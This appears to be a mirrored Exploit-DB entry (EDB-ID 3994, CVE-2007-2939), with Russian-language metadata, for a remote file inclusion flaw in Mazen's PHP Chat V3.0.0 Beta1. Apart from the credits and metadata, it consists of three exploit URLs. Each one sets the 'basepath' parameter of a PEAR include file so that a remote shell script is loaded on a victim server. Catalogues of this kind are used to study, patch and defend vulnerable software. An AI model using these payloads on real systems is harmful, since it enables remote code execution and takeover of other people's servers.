Exploit Mazens PHP Chat V3 (basepath) - Remote File Inclusion

[Exploiter]

EDB-ID

3994

Проверка EDB

1. Пройдено

Автор

THE TIGER

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-2939

Дата публикации

2007-05-26

#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]